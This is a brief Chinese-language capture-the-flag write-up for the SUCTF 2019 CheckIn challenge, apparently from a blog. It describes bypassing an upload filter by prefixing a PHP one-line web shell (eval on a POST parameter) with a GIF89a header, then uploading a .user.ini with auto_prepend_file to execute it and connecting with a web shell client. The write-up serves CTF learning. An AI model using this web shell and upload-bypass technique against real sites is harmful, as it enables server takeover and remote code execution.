[SUCTF 2019]CheckIn1

 黑名单过滤后缀’ph',并且白名单image类型要有对应文件头

对<?过滤,改用GIF89a<script language='php'>@eval($_POST['cmd']);</script>,成功把getshell.gif上传上去了

尝试用.htaccess将上传的gif当作php解析,但是失败了

根据这篇文章.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前

 

 

可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行

 

连接蚁剑找到flag 

相关推荐

  1. [安洵杯 2019]game & [SUCTF2018]babyre

    2024-01-27 02:30:03       34 阅读
  2. <span style='color:red;'>SWCTF</span>

    SWCTF

    2024-01-27 02:30:03      15 阅读
  3. [COCI2018-2019#1] Zamjena 解题记录

    2024-01-27 02:30:03       17 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-01-27 02:30:03       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-27 02:30:03       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-27 02:30:03       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-27 02:30:03       18 阅读

热门阅读

  1. 【知识---git中一些常用的命令及其选项】

    2024-01-27 02:30:03       26 阅读
  2. Android 写入 csv 乱码,设置UTF-8的流也不行

    2024-01-27 02:30:03       42 阅读
  3. vue开发的PC端项目使用postcss-to-viewport适配移动端

    2024-01-27 02:30:03       39 阅读
  4. WordPress wp-file-manager 文件上传漏洞 CVE-2020-25213

    2024-01-27 02:30:03       30 阅读
  5. element中form校验中清除校验不通过的提示语

    2024-01-27 02:30:03       36 阅读
  6. 【Git】Conventional Commit提交规范

    2024-01-27 02:30:03       28 阅读